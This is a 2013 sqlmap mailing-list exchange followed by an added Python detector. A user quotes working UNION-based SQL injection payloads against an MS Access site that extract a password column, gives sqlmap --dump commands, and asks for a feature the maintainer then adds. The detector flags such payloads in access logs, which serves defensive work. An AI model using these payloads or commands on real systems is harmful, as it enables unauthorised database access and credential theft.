Re: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln
From: Miroslav S. <mir...@gm...> - 2013-03-21 10:32:38
Hi Buawig.

Implemented as requested [1]. Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/423

On Tue, Mar 19, 2013 at 8:34 PM, buawig <bu...@gm...> wrote:

> Hi,
>
> I've got a simple union based sqli (resulting webpage shows only one
> entry/row).
>
> Valid statements that show the numbers in the resulting html page:
>
> ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
> ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
>
> - foobar is an existing table (gathered via error messages in html)
> - password is a valid column in the foobar table
>
> The following URL gives you one password:
>
> ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
> from foobar
>
>
> Now I wanted to hand over to sqlmap to dump all passwords:
>
> sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password --dump
>
> which did not work out (0 entries retrieved), but it was confirmed
> that the table has several hundred entries.
>
> - sqlmap was able to detect the number of columns is 13 (correct)
> - sqlmap confirmed a boolean-based blind sqli vulnerability (but no
>   UNION based sqli)
> - sqlmap was able to confirm the existence of table name (with --tables)
>   (echo foobar > txt/common-tables.txt)
> - sqlmap was able to confirm the existence of column name password
>   (with --columns)
>
> When running something like:
> --technique=U --union-cols=13 --union-char=1
>
> sqlmap requested something *like*:
>
> ...id=-123 union all select
> 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
> MSysAccessObjects%00
>
> which results in the following error message (shown in the html page):
>
> The Microsoft Jet database engine cannot find the input table or query
> 'MSysAccessObjects'. Make sure it exists and that its name is spelled
> correctly.
>
> So if sqlmap would accept a known tablename on the command line that
> it would use to detect/confirm the union based sqli vuln, instead of
> using "MSysAccessObjects" this would make sqlmap more useful
> (or simply use the table name specified in -T or previously
> bruteforced to detect union-based sqli).
>
> thanks!
>
> PS: I did *not* run sqlmap with special --risk/--level because I don't
> want to send several unneeded http requests if the vulnerability is
> already confirmed (manually). I'm using sqlmap mainly for exploitation
> (not so much for detection) and would appreciate if the user could
> tell sqlmap how to exploit a certain sqli (something that is already
> partially given with --technique, --union-cols, --union-chars).
>
> I did use 1.0-dev-d1ae62b.
>
> ref:
> http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
>
> http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html

--
Miroslav Stampar
http://about.me/stamparm
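
A detection-side view of the requests quoted in this thread, as an added example that is not part of the original messages or of sqlmap's code: it flags UNION SELECT payloads in query-string parameters and reports the FROM table, the CHR() concatenation marker and the %00 terminator. The log lines, the /item.asp path and the name inspect_request are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
FROM_RE = re.compile(r"\bfrom\s+\[?(\w+)\]?", re.I)
# String built from concatenated CHR() calls, e.g. CHR(58)&CHR(111)&CHR(58)
CHR_RE = re.compile(r"chr\(\d+\)(?:\s*&\s*chr\(\d+\))+", re.I)


def inspect_request(request_line):
    """Return findings for the first parameter carrying a UNION SELECT, else None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    # parse_qsl percent-decodes values, so %20, %26 and %00 become ' ', '&', NUL.
    for name, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        match = UNION_RE.search(value)
        if not match:
            continue
        tail = value[match.end():]
        table = FROM_RE.search(tail)
        table_name = table.group(1) if table else None
        return {
            "param": name,
            "table": table_name,
            # Access system tables are named MSys*; normal page requests never name them.
            "system_table": bool(table_name) and table_name.lower().startswith("msys"),
            "chr_marker": bool(CHR_RE.search(tail)),
            "null_terminated": "\x00" in value,
        }
    return None


# Constructed access-log request lines modelled on the requests quoted in the thread.
SAMPLE = [
    "GET /item.asp?cat=2&id=123 HTTP/1.1",
    "GET /item.asp?cat=2&id=-123%20union%20all%20select%201,2,3,4,5,6,"
    "CHR(58)%26CHR(111)%26CHR(58),8,9,10,11,12,13%20from%20MSysAccessObjects%00 HTTP/1.1",
    "GET /item.asp?id=123%20union%20select%20top%201%201,2,3,4,5,6,password,"
    "8,9,10,11,12,13%20from%20foobar HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect_request(line))
```

A payload sent with a raw, unencoded `&` is split into separate parameters by `parse_qsl`, so the UNION is still flagged but the table and marker fields may come back empty.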